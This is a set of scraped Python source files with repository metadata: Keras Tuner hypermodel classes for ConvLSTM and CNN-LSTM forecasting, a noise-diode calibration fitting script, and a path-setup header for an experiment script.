"convLSTM2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_4", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_4_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI4(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_3", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_5", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_5", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_5",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_6", min_value=3, max_value=5, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI5(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_2", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_3", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_4", min_value=3, max_value=5, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI6(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI7(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_3", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_5", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_5", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_5",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_6", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_7", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_7",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_7",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_8", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_8_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI8(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_3", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_4", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_6", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_6",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_6",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_7", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_7_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI9(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_3", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_4",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_4",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_5", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_5_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI10(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_3", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_5", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_5", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_5",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_6", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_7", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_7",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_7",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI11(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
filters=hp.Int(
"conv2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_3", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_4", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_6", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_6",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_6",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI12(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_3", min_value=64, max_value=448, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(
l1=hp.Float(
"kernel_regularizer_layer_4",
min_value=0,
max_value=0.105,
step=0.0075,
default=1e-2,
)
),
dropout=hp.Float(
"dropout_regularizer_layer_4",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI13(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=16, step=8, default=16
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_4", min_value=64, max_value=448, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(l1=0),
dropout=hp.Float(
"dropout_regularizer_layer_4",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_5", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_5_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-5,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI14(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Conv2D(
input_shape=self.input_shape,
filters=hp.Int(
"conv2d_filters_layer_1", min_value=8, max_value=16, step=8, default=16
),
kernel_size=hp.Int(
"conv2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool_kernel_layer_2", min_value=3, max_value=7, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.Flatten()
)
)
model.add(
tf.keras.layers.LSTM(
units=hp.Int(
"lstm_units_layer_4", min_value=64, max_value=512, step=64, default=128
),
activation='tanh',
kernel_regularizer=tf.keras.regularizers.L1(l1=0),
dropout=hp.Float(
"dropout_regularizer_layer_4",
min_value=0,
max_value=0.99,
step=0.09,
default=0
),
return_sequences=False,
stateful=False
)
)
model.add(
tf.keras.layers.Dense(units=self.n_steps_out,activation=None)
)
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-5,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model | [
"[email protected]"
] | |
61d903d2962755912aa8dac21eaa78b97774cbf8 | 5b473f7876104de55b0ac19616c9ef0976c2f224 | /cals/NoiseDiode/ND_atten_fit.py | ab7a122198042084db22e7ce4274e87374b7e8a6 | [] | no_license | SDRAST/Receivers_WBDC | 80f3c2481fb09b9875b9ecd1687a4cc194ab9005 | 3e1d49d3daf361608331fcdf3c6c3e41b4ad9de9 | refs/heads/master | 2022-12-23T20:21:22.281484 | 2020-09-30T23:00:19 | 2020-09-30T23:00:19 | 291,369,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,642 | py | # -*- coding: utf-8 -*-
"""
These data are from the calibration log for Fri Apr 8 16:03:55 2011
Add ctrl_voltage as a method to ND. ND should probably be raised to a class
"""
import numpy as NP
from pylab import *
import scipy
def ctrl_voltage(ND):
coefs = array([ 3.85013993e-18, -6.61616152e-15, 4.62228606e-12,
-1.68733555e-09, 3.43138077e-07, -3.82875899e-05,
2.20822016e-03, -8.38473034e-02, 1.52678586e+00])
return scipy.polyval(coefs,ND)
data = NP.array([
[-6.00, -28.716],
[-5.75, -28.732],
[-5.50, -28.757],
[-5.25, -28.797],
[-5.00, -28.851],
[-4.75, -28.928],
[-4.50, -29.035],
[-4.25, -29.179],
[-4.00, -29.355],
[-3.75, -29.555],
[-3.50, -29.775],
[-3.25, -29.992],
[-3.00, -30.189],
[-2.75, -30.378],
[-2.50, -30.548],
[-2.25, -30.691],
[-2.00, -30.822],
[-1.75, -30.926],
[-1.50, -31.028],
[-1.25, -31.109],
[-1.00, -31.206],
[-0.75, -31.296],
[-0.50, -31.388],
[-0.25, -31.498],
[ 0.00, -31.612],
[ 0.25, -31.747],
[ 0.50, -31.880],
[ 0.75, -31.995],
[ 1.00, -32.078],
[ 1.25, -32.116],
[ 1.50, -32.136],
[ 1.75, -32.144]])
ctrlV = data[:,0]
pwr_dB = data[:,1]
pwr_W = pow(10.,pwr_dB/10)
min_pwr = pwr_W.min()
max_pwr = pwr_W.max()
gain = 320/min_pwr
TsysMax = gain*max_pwr # assuming the system was linear, which it was
print "Tsys with full ND =",TsysMax
NDmax = TsysMax-320
print "Tnd(max) =",NDmax
ND =gain*pwr_W - 320
plot(ND,ctrlV)
ylabel("Control Voltage (V)")
xlabel("Noise Diode (K)")
grid()
coefs = scipy.polyfit(ND,ctrlV, 8)
print coefs
vctrl_voltage = NP.vectorize(ctrl_voltage)
x = arange(0,350,10)
plot(x,vctrl_voltage(x),'ro')
show()
| [
"[email protected]"
] | |
8ab81a05046b4fbe1d20f70062f9411fee994e8d | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/doc3d/I_to_M_Gk3_no_pad/pyr_Tcrop255_pad20_jit15/Sob_k17_s001/pyr_4s/L4/step10_a.py | 75773149c2e2458db22e88582b00384156b134b7 | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41,921 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path
code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層
code_dir = "\\".join(code_exe_path_element[:-1])
kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir
import sys ### 把 kong_model2 加入 sys.path
sys.path.append(kong_model2_dir)
sys.path.append(code_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" code_dir:", code_dir)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
kong_to_py_layer = len(code_exe_path_element) - 1 - kong_layer ### 中間 -1 是為了長度轉index
# print(" kong_to_py_layer:", kong_to_py_layer)
if (kong_to_py_layer == 0): template_dir = ""
elif(kong_to_py_layer == 2): template_dir = code_exe_path_element[kong_layer + 1][0:] ### [7:] 是為了去掉 step1x_, 後來覺得好像改有意義的名字不去掉也行所以 改 0
elif(kong_to_py_layer == 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:] ### [5:] 是為了去掉 mask_ ,前面的 mask_ 是為了python 的 module 不能 數字開頭, 隨便加的這樣子, 後來覺得 自動排的順序也可以接受, 所以 改0
elif(kong_to_py_layer > 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:] + "/" + "/".join(code_exe_path_element[kong_layer + 3: -1])
# print(" template_dir:", template_dir) ### 舉例: template_dir: 7_mask_unet/5_os_book_and_paper_have_dtd_hdr_mix_bg_tv_s04_mae
#############################################################################################################################################################################################################
exp_dir = template_dir
#############################################################################################################################################################################################################
from step06_a_datas_obj import *
from step09_4side_L4 import *
from step10_a2_loss_info_obj import *
from step10_b2_exp_builder import Exp_builder
rm_paths = [path for path in sys.path if code_dir in path]
for rm_path in rm_paths: sys.path.remove(rm_path)
